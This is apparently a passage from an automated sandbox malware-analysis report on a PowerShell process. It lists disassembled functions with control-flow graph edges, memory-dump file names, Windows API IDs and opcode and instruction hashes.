                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2358200446.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848a50000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 6^$6^
                                                                                                                                            • API String ID: 0-841192639
                                                                                                                                            • Opcode ID: a336a78ff8a6d29422de919cfa308e9332779edc2ec1adad2af1f83997c057a0
                                                                                                                                            • Instruction ID: bf713b9ff4240316c45c8146c1e36ed5825c84eb5db1f2078d20a3f1f4e7f252
                                                                                                                                            • Opcode Fuzzy Hash: a336a78ff8a6d29422de919cfa308e9332779edc2ec1adad2af1f83997c057a0
                                                                                                                                            • Instruction Fuzzy Hash: 1EA10B31F0EA468FE789EB3C44262B9B7D2EF55750B0441FEC04ECB296DE685C828755
                                                                                                                                            Function 00007FF848B22DBA Relevance: 2.3, Strings: 1, Instructions: 1003COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 326 7ff848b22dba-7ff848b22e43 335 7ff848b22e4a-7ff848b22e5b 326->335 336 7ff848b22e45 326->336 338 7ff848b22e5d 335->338 339 7ff848b22e62-7ff848b22ef7 335->339 336->335 337 7ff848b22e47 336->337 337->335 338->339 341 7ff848b22e5f 338->341 343 7ff848b22efd-7ff848b22f07 339->343 344 7ff848b2304f-7ff848b2308c 339->344 341->339 345 7ff848b22f09-7ff848b22f21 343->345 346 7ff848b22f23-7ff848b22f30 343->346 355 7ff848b2308e-7ff848b230d6 344->355 356 7ff848b230d7-7ff848b230fd 344->356 345->346 353 7ff848b22ff0-7ff848b22ffa 346->353 354 7ff848b22f36-7ff848b22f39 346->354 357 7ff848b23009-7ff848b2304c 353->357 358 7ff848b22ffc-7ff848b23008 353->358 354->353 359 7ff848b22f3f-7ff848b22f47 354->359 355->356 377 7ff848b230ff 356->377 378 7ff848b23100-7ff848b23111 356->378 357->344 359->344 362 7ff848b22f4d-7ff848b22f57 359->362 365 7ff848b22f59-7ff848b22f6e 362->365 366 7ff848b22f70-7ff848b22f74 362->366 365->366 366->353 367 7ff848b22f76-7ff848b22f79 366->367 370 7ff848b22f7b-7ff848b22f84 367->370 371 7ff848b22f90-7ff848b22f94 367->371 370->371 371->353 381 7ff848b22f96-7ff848b22f9c 371->381 377->378 379 7ff848b23113 378->379 380 7ff848b23114-7ff848b231a7 378->380 379->380 390 7ff848b231ad-7ff848b231b7 380->390 391 7ff848b232ff-7ff848b233ad 380->391 384 7ff848b22fbb-7ff848b22fc9 381->384 385 7ff848b22f9e-7ff848b22fb9 381->385 393 7ff848b22fcb-7ff848b22fd8 384->393 394 7ff848b22fe2-7ff848b22fef 384->394 385->384 395 7ff848b231b9-7ff848b231d1 390->395 396 7ff848b231d3-7ff848b231e0 390->396 433 7ff848b233af 391->433 434 7ff848b233b0-7ff848b233c1 391->434 393->394 398 7ff848b22fda-7ff848b22fe0 393->398 395->396 405 7ff848b232a0-7ff848b232aa 396->405 406 7ff848b231e6-7ff848b231e9 396->406 398->394 409 7ff848b232b9-7ff848b232fc 405->409 410 7ff848b232ac-7ff848b232b8 405->410 406->405 411 7ff848b231ef-7ff848b231f7 406->411 409->391 411->391 414 7ff848b231fd-7ff848b23207 411->414 415 7ff848b23209-7ff848b2321e 414->415 416 7ff848b23220-7ff848b23224 414->416 415->416 416->405 417 7ff848b23226-7ff848b23229 416->417 421 7ff848b2322b-7ff848b2324e 417->421 422 7ff848b23250 417->422 424 7ff848b23252-7ff848b23254 421->424 422->424 424->405 427 7ff848b23256-7ff848b23260 424->427 430 7ff848b23262-7ff848b23269 427->430 432 7ff848b23270-7ff848b23279 430->432 435 7ff848b2327b-7ff848b23288 432->435 436 7ff848b23292-7ff848b2329f 432->436 433->434 437 7ff848b233c3 434->437 438 7ff848b233c4-7ff848b23449 434->438 435->436 440 7ff848b2328a-7ff848b23290 435->440 437->438 445 7ff848b2344f-7ff848b23462 438->445 446 7ff848b234e1-7ff848b234eb 438->446 440->436 451 7ff848b23548-7ff848b2355d 445->451 452 7ff848b23468-7ff848b23472 445->452 447 7ff848b234f8-7ff848b23545 446->447 448 7ff848b234ed-7ff848b234f7 446->448 447->451 461 7ff848b2355f 451->461 462 7ff848b23561-7ff848b23579 451->462 454 7ff848b2348c-7ff848b23497 452->454 455 7ff848b23474-7ff848b2348a 452->455 454->446 457 7ff848b23499-7ff848b234de 454->457 455->454 457->446 461->462 464 7ff848b235a1-7ff848b235cc 461->464 462->464 468 7ff848b235ce-7ff848b235db 464->468 469 7ff848b235e5-7ff848b23610 464->469 468->469 473 7ff848b235dd-7ff848b235e3 468->473 473->469
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2361494526.00007FF848B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848b20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $_
                                                                                                                                            • API String ID: 0-2628234157
                                                                                                                                            • Opcode ID: cfa5219380a2b07c0f4f10239e7c928a5dce69b4b44fe26f17d85b3803be02af
                                                                                                                                            • Instruction ID: 3a53c420bfec6e7152caca09ce5148d28621a35ceb8c69acd9b9716eb9fb0e3a
                                                                                                                                            • Opcode Fuzzy Hash: cfa5219380a2b07c0f4f10239e7c928a5dce69b4b44fe26f17d85b3803be02af
                                                                                                                                            • Instruction Fuzzy Hash: 9C524631E0DB8A4FE796AA3C58686B57BE1EF5A250F4801FBD04CC75A3DE189C06C352
                                                                                                                                            Function 00007FF848A5D4F9 Relevance: 1.7, APIs: 1, Instructions: 245fileCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2358200446.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848a50000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                            • Opcode ID: b9cd1a365a0e7e21b610ad4a29e54d720907d89be6993f0eeb6c706a4d160290
                                                                                                                                            • Instruction ID: f37a7636bc8b347f81b709a63fb636558feeb67820af9797c3c24704c69c3f24
                                                                                                                                            • Opcode Fuzzy Hash: b9cd1a365a0e7e21b610ad4a29e54d720907d89be6993f0eeb6c706a4d160290
                                                                                                                                            • Instruction Fuzzy Hash: 48712771A0DA484FD758EF2C985A6B97BE1FF59310F0402BFE04DD7292DB74A8428B81
                                                                                                                                            Function 00007FF848A54630 Relevance: 1.7, APIs: 1, Instructions: 167COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2358200446.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848a50000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 8fed051afcdc260c2a3db968d82056c71a58f3f462e2adebfabf209f094dda2a
                                                                                                                                            • Instruction ID: f3315876bb6ba02aca6bfebe5d655b8ede9f39b039c999bc41e77737eb5dfb5c
                                                                                                                                            • Opcode Fuzzy Hash: 8fed051afcdc260c2a3db968d82056c71a58f3f462e2adebfabf209f094dda2a
                                                                                                                                            • Instruction Fuzzy Hash: DE514B71D0EA584FEB18EF68984A6B9BBE1FF54350F04417EE04DD3252CB74A845CB86
                                                                                                                                            Function 00007FF848A545DA Relevance: 1.6, APIs: 1, Instructions: 130fileCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 737 7ff848a545da-7ff848a5d673 742 7ff848a5d67d-7ff848a5d6dc CreateFileW 737->742 743 7ff848a5d675-7ff848a5d67a 737->743 744 7ff848a5d6de 742->744 745 7ff848a5d6e4-7ff848a5d70c 742->745 743->742 744->745
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2358200446.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848a50000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                            • Opcode ID: cb69dc47c7f78f75b5c148b7d6e675c9e478f00083d6c407a47a29b718ff1f4b
                                                                                                                                            • Instruction ID: 0e21fb63e8b7e69e9fcd725104a377d4eda1e1a35b5a7fc3996f17848f7987ff
                                                                                                                                            • Opcode Fuzzy Hash: cb69dc47c7f78f75b5c148b7d6e675c9e478f00083d6c407a47a29b718ff1f4b
                                                                                                                                            • Instruction Fuzzy Hash: 4531817191CA1C9FDB58EF58D846AF9B7E0FB69311F00422EE04EE3251CB71A8428B85
                                                                                                                                            Function 00007FF848A545EA Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 747 7ff848a545ea-7ff848a9fce2 GetFileType 751 7ff848a9fce4 747->751 752 7ff848a9fcea-7ff848a9fd0f 747->752 751->752
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2358200446.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848a50000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileType
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3081899298-0
                                                                                                                                            • Opcode ID: 069fe64d36fe05a106186e370ca5c2b56f593ab68961f0513c80e2f3b9197b86
                                                                                                                                            • Instruction ID: 534ff1dff946c7f653a3c805b636540afa53b44905f6752b437557604d7e656d
                                                                                                                                            • Opcode Fuzzy Hash: 069fe64d36fe05a106186e370ca5c2b56f593ab68961f0513c80e2f3b9197b86
                                                                                                                                            • Instruction Fuzzy Hash: 9C219270A0CA0C9FDB58EB58D845BFDB7E0FB55321F00422ED04AD3651DB71A856CB91
                                                                                                                                            Function 00007FF848B25646 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 754 7ff848b25646-7ff848b256d1 761 7ff848b256db-7ff848b256f1 754->761 763 7ff848b256f3 761->763 764 7ff848b256f4-7ff848b256fd 761->764 763->764 765 7ff848b256ff 764->765 766 7ff848b25705 764->766 765->766 767 7ff848b25708-7ff848b25719 766->767 768 7ff848b25707 766->768 769 7ff848b2571b 767->769 770 7ff848b2571c-7ff848b25729 767->770 768->767 769->770
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2361494526.00007FF848B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848b20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: `%_
                                                                                                                                            • API String ID: 0-1464531874
                                                                                                                                            • Opcode ID: d2a4845db4ad732af855851c3c343510d520e968684a6570b9f2988bccc074d5
                                                                                                                                            • Instruction ID: 26b8f8afab74056a998b825782820936087e2bcb557709272a9f27bfdd6710c1
                                                                                                                                            • Opcode Fuzzy Hash: d2a4845db4ad732af855851c3c343510d520e968684a6570b9f2988bccc074d5
                                                                                                                                            • Instruction Fuzzy Hash: 31310560D4E6CA9FE797AB7808685B17FE4EF532A4F0841FBD098C70A3DA0C1846C356
                                                                                                                                            Function 00007FF848B215DD Relevance: .7, Instructions: 662COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 794 7ff848b215dd-7ff848b215e7 795 7ff848b215e9 794->795 796 7ff848b215ee-7ff848b215ff 794->796 795->796 797 7ff848b215eb 795->797 798 7ff848b21601 796->798 799 7ff848b21606-7ff848b21617 796->799 797->796 798->799 802 7ff848b21603 798->802 800 7ff848b21619 799->800 801 7ff848b2161e-7ff848b2162f 799->801 800->801 803 7ff848b2161b 800->803 804 7ff848b21631 801->804 805 7ff848b21636-7ff848b21647 801->805 802->799 803->801 804->805 806 7ff848b21633 804->806 807 7ff848b21649 805->807 808 7ff848b2164e-7ff848b2170f 805->808 806->805 807->808 809 7ff848b2164b 807->809 812 7ff848b21715-7ff848b2171f 808->812 813 7ff848b21926-7ff848b219a5 808->813 809->808 814 7ff848b2173b-7ff848b21748 812->814 815 7ff848b21721-7ff848b21739 812->815 841 7ff848b219ac-7ff848b219bb 813->841 822 7ff848b218bb-7ff848b218c5 814->822 823 7ff848b2174e-7ff848b21751 814->823 815->814 826 7ff848b218d8-7ff848b21923 822->826 827 7ff848b218c7-7ff848b218d7 822->827 823->822 825 7ff848b21757-7ff848b2175f 823->825 825->813 829 7ff848b21765-7ff848b2176f 825->829 826->813 831 7ff848b21789-7ff848b2178f 829->831 832 7ff848b21771-7ff848b2177f 829->832 831->822 836 7ff848b21795-7ff848b21798 831->836 832->831 837 7ff848b21781-7ff848b21787 832->837 838 7ff848b2179a-7ff848b217ad 836->838 839 7ff848b217e1 836->839 837->831 838->813 846 7ff848b217b3-7ff848b217bd 838->846 840 7ff848b217e3-7ff848b217e5 839->840 840->822 844 7ff848b217eb-7ff848b217ee 840->844 849 7ff848b219c6-7ff848b219d7 841->849 847 7ff848b217f0-7ff848b217f9 844->847 848 7ff848b21805-7ff848b21809 844->848 850 7ff848b217bf-7ff848b217d4 846->850 851 7ff848b217d6-7ff848b217df 846->851 847->848 848->822 856 7ff848b2180f-7ff848b21815 848->856 857 7ff848b219d9 849->857 858 7ff848b219e0-7ff848b219ef 849->858 850->851 851->840 859 7ff848b21831-7ff848b21837 856->859 860 7ff848b21817-7ff848b21824 856->860 857->858 861 7ff848b219f8-7ff848b21a75 858->861 862 7ff848b219f1 858->862 865 7ff848b21839-7ff848b21846 859->865 866 7ff848b21853-7ff848b21890 859->866 860->859 867 7ff848b21826-7ff848b2182f 860->867 877 7ff848b21ae8-7ff848b21af2 861->877 878 7ff848b21a77-7ff848b21a87 861->878 862->861 865->866 871 7ff848b21848-7ff848b21851 865->871 888 7ff848b218a9-7ff848b218ba 866->888 889 7ff848b21892-7ff848b218a7 866->889 867->859 871->866 880 7ff848b21afc-7ff848b21b41 877->880 881 7ff848b21af4-7ff848b21af9 877->881 886 7ff848b21a89-7ff848b21a92 878->886 887 7ff848b21a94-7ff848b21aaa 878->887 884 7ff848b21afa-7ff848b21afb 881->884 886->887 887->884 895 7ff848b21aac-7ff848b21ae5 887->895 889->888
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2361494526.00007FF848B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848b20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: b94ca240148420bec925d04c29f8e6ebb7d03b09c8d7b5761f9ba5c59cc83497
                                                                                                                                            • Instruction ID: 6087b724dd5e17119f239a676212035d041387100e0c8bb12bf2fee9e124c3de
                                                                                                                                            • Opcode Fuzzy Hash: b94ca240148420bec925d04c29f8e6ebb7d03b09c8d7b5761f9ba5c59cc83497
                                                                                                                                            • Instruction Fuzzy Hash: A7122521D0EBC51FE397A77858691B47FE1EF42250F4901FBD089CB6A3DA18AC46C356
                                                                                                                                            Function 00007FF848B28445 Relevance: .4, Instructions: 436COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2361494526.00007FF848B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848b20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 00cbeab2d36eacdbeee4901391a74e418523904a7002461df5b79b20491026e4
                                                                                                                                            • Instruction ID: fa417824aa69da460954f9e733bfa0fa3e2b4bef42960375f977d25e035dfd62
                                                                                                                                            • Opcode Fuzzy Hash: 00cbeab2d36eacdbeee4901391a74e418523904a7002461df5b79b20491026e4
                                                                                                                                            • Instruction Fuzzy Hash: B7D14631E0EA8A5FE79AAB6858195B97BE0FF15390F4800FED09CC7593DB18AC05C356
                                                                                                                                            Function 00007FF848B22BD4 Relevance: .2, Instructions: 200COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2361494526.00007FF848B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848b20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 6bb6decdc5532424bdd3d29213eced7396436214c74c4173bcb69aee313d5af4
                                                                                                                                            • Instruction ID: 9d8c6b83b12e45b863ac368440b32e5bef81e4917dd805e5d45f0dfbd9feb0f8
                                                                                                                                            • Opcode Fuzzy Hash: 6bb6decdc5532424bdd3d29213eced7396436214c74c4173bcb69aee313d5af4
                                                                                                                                            • Instruction Fuzzy Hash: 6E514831F1EE8A4FFBAAAA3C64152B9B6D1EF45790F9405BAC40DC75D3EE08E8058345
                                                                                                                                            Function 00007FF848B23120 Relevance: .2, Instructions: 182COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2361494526.00007FF848B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848b20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 7d30ced99c093490ff9e4670aeb704ef3dc266823cab870a6d5aa48118917768
                                                                                                                                            • Instruction ID: cedf6f41a9e24dd361a8563ab95d6e06b873b420b18de76d4139daff2875c94b
                                                                                                                                            • Opcode Fuzzy Hash: 7d30ced99c093490ff9e4670aeb704ef3dc266823cab870a6d5aa48118917768
                                                                                                                                            • Instruction Fuzzy Hash: 5E511331E1DB894FE796EA2C54682B97BE1EF5A350F8901FBC00CC75A7DE189C058356
                                                                                                                                            Function 00007FF848B22C20 Relevance: .1, Instructions: 115COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2361494526.00007FF848B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_7ff848b20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 1e04162dc2409baae1290aed9aa02ca68623a59737094cfeda96f7b31a0c93d4
                                                                                                                                            • Instruction ID: 1714b6f054707bec21c8d7705201eed942b357db4dc617e066691f410ebf65ea
                                                                                                                                            • Opcode Fuzzy Hash: 1e04162dc2409baae1290aed9aa02ca68623a59737094cfeda96f7b31a0c93d4
                                                                                                                                            • Instruction Fuzzy Hash: 90312421E1EE8B4FF7AAA63C1419278A9D1EF153D1F9409BAC40DC75D3EE0CAC484309